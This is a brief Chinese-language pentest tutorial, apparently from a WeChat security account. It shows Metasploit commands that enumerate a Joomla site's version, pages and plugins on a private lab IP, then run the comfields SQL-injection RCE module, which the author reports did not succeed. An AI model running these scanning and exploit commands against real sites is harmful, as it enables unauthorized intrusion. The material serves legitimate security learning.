一、使用Metasploit对Joomal进行侦察
1、探测版本信息
选择joomla_version辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_version
set rhosts 192.168.1.111
set rport 8080
run2、页面枚举
选择Joomla_pages辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_pages
set rhosts 192.168.1.111
set rport 8080
run3、插件枚举
选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行
use auxiliary/scanner/http/joomla_plugins
set rhosts 192.168.1.111
set rport 8080
run二、使用Metasploit对Joomla进行漏洞利用
1、use unix/webapp/joomla_comfields_sqli_rce
2、set rhosts 192.168.1.111
3、set rport 8080
4、run5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。
该系列教程内容参考自华章IT出版的
《Web渗透测试实战:基于Metasploit 5.0》
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧